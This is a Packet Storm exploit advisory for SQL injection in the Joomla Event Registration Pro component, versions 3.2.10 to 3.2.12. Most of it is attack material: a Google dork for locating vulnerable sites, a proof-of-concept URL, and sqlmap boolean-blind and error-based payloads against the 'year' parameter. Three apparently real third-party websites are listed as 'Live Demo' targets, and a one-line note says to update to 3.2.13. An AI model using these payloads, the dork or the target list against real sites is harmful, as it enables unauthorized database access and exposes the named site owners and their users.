Joomla Registration Pro 3.2.12 SQL Injection

2016-08-12T00:00:00
ID PACKETSTORM:138308
Type packetstorm
Reporter xBADGIRL21
Modified 2016-08-12T00:00:00

Description

                                        
                                            `######################  
# ____ _ ____ ____ ___ ____ _ ____ _  
# __ _| __ ) / \ | _ \ / ___|_ _| _ \| | |___ \/ |  
# \ \/ / _ \ / _ \ | | | | | _ | || |_) | | __) | |  
# > <| |_) / ___ \| |_| | |_| || || _ <| |___ / __/| |  
# /_/\_\____/_/ \_\____/ \____|___|_| \_\_____|_____|_|  
#  
######################  
# Exploit Title : Joomla com_registrationpro SQL injection Vulnerability  
# Exploit Author : xBADGIRL21  
# Dork : inurl:index.php?option=com_registrationpro  
# Vendor Homepage : http://www.joomlashowroom.com/  
# version : 3.2.12 - 3.2.10  
# Tested on: [ BACKBOX]  
# skype:xbadgirl21  
# Date: 10/08/2016  
# video Proof : https://www.youtube.com/watch?v=GcEQMd7Dvl4  
######################  
# [+] DESCRIPTION :  
######################  
# [+] Event Registration Pro is a Joomla extension for accepting online  
registrations and payments for events  
# [+] training classes, conferences, and seminars.  
# [+] AND an SQL injection has been Detected in this Joomla components  
registrationpro  
######################  
# [+] Poc :  
######################  
# [year] Get Parameter Vulnerable To SQLi  
#  
http://127.0.0.1/index.php?option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=2021  
'  
######################  
# [+] SQLmap PoC:  
######################  
# Parameter: year (GET)  
# Type: boolean-based blind  
# Title: MySQL >= 5.0 boolean-based blind - Parameter replace  
# Payload:  
option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=(SELECT  
(CASE WHEN (5274=5274) THEN 5274 ELSE 5274*(SELECT 5274 FROM  
INFORMATION_SCHEMA.CHARACTER_SETS) END))  
#  
# Type: error-based  
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP  
BY clause  
# Payload:  
option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=2021  
AND (SELECT 8657 FROM(SELECT #COUNT(*),CONCAT(0x71767a7171,(SELECT  
(ELT(8657=8657,1))),0x71786b7171,FLOOR(RAND(0)*2))x FROM  
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)  
# ---  
# GET parameter 'year' is vulnerable. Do you want to keep testing the  
others (if any)? [y/N]  
######################  
# [!] Live Demo :  
######################  
http://www.k-noe.fr/achats/fr/registration/index.php?option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=2021  
http://gallery7theatre.com/index.php?option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=2021  
http://advancedbrain.com/index.php?option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=2021  
######################  
# Solution  
######################  
# Just Update to the Last Version =00=> Version #: [ 3.2.13 ]  
######################  
# Discovered by : xBADGIRL21  
# Greetz : All Mauritanien Hackers - NoWhere  
######################  
`